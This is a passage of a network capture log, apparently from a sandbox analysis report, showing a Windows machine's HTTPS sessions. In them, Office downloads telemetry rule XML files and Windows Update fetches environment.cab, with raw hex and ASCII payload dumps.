                                2024-12-03 16:51:53 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                92192.168.2.55006013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:53 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1395
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                ETag: "0x8DC582BDE12A98D"
                                x-ms-request-id: e61fb942-301e-000c-78b4-43323f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968ljs8phC1EWRe6en000000161g00000000e6d4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                Session IDSource IPSource PortDestination IPDestination Port
                                93192.168.2.55005813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:53 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1395
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE017CAD3"
                                x-ms-request-id: 2eabf22f-f01e-005d-68dc-4313ba000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f7845968vqt9xhC1EWRgten000000166000000000q49b
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                Session IDSource IPSource PortDestination IPDestination Port
                                94192.168.2.55006113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:53 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:53 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:53 GMT
                                Content-Type: text/xml
                                Content-Length: 1358
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE022ECC5"
                                x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165153Z-174f78459688l8rvhC1EWRtzr00000000kwg000000002pqb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:53 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                95192.168.2.55006513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:55 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:55 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1368
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                ETag: "0x8DC582BDDC22447"
                                x-ms-request-id: 14abde1b-801e-0047-6aab-437265000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968ljs8phC1EWRe6en0000001650000000001c1m
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:55 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                Session IDSource IPSource PortDestination IPDestination Port
                                96192.168.2.55006313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:55 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1352
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                ETag: "0x8DC582BE9DEEE28"
                                x-ms-request-id: 0e5d9e53-c01e-0066-77ee-44a1ec000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968px8v7hC1EWR08ng00000016hg0000000038wq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                Session IDSource IPSource PortDestination IPDestination Port
                                97192.168.2.55006613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:55 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:55 GMT
                                Content-Type: text/xml
                                Content-Length: 1401
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE055B528"
                                x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165155Z-174f7845968kvnqxhC1EWRmf3g0000000t1g000000008x1h
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                98192.168.2.55006820.109.210.53443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:55 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-12-03 16:51:56 UTC560INHTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                MS-CorrelationId: f76feeae-ce4e-4ad3-bdd8-8600db2568db
                                MS-RequestId: 82ae44d8-b31f-4202-968f-2e6f0421a13a
                                MS-CV: 3e0y9cf41E2e0PXF.0
                                X-Microsoft-SLSClientCache: 1440
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Tue, 03 Dec 2024 16:51:56 GMT
                                Connection: close
                                Content-Length: 30005
                                2024-12-03 16:51:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                2024-12-03 16:51:56 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                Session IDSource IPSource PortDestination IPDestination Port
                                99192.168.2.55006713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:55 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:56 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:56 GMT
                                Content-Type: text/xml
                                Content-Length: 1364
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE1223606"
                                x-ms-request-id: c3f555e4-101e-0028-3c1d-418f64000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165156Z-174f7845968xlwnmhC1EWR0sv800000015yg00000000rzuu
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:56 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                100192.168.2.55007113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:58 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1403
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                ETag: "0x8DC582BDCB4853F"
                                x-ms-request-id: 5c1224a4-501e-0029-53ee-44d0b8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f7845968j6t2phC1EWRcfe8000000168g00000000uc3u
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                Session IDSource IPSource PortDestination IPDestination Port
                                101192.168.2.55006913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:58 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1397
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                ETag: "0x8DC582BE7262739"
                                x-ms-request-id: 931d4756-e01e-001f-0f26-401633000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165158Z-174f78459684bddphC1EWRbht400000015w000000000qhua
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:58 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                Session IDSource IPSource PortDestination IPDestination Port
                                102192.168.2.55007013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:58 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:58 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:58 GMT
                                Content-Type: text/xml
                                Content-Length: 1360
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
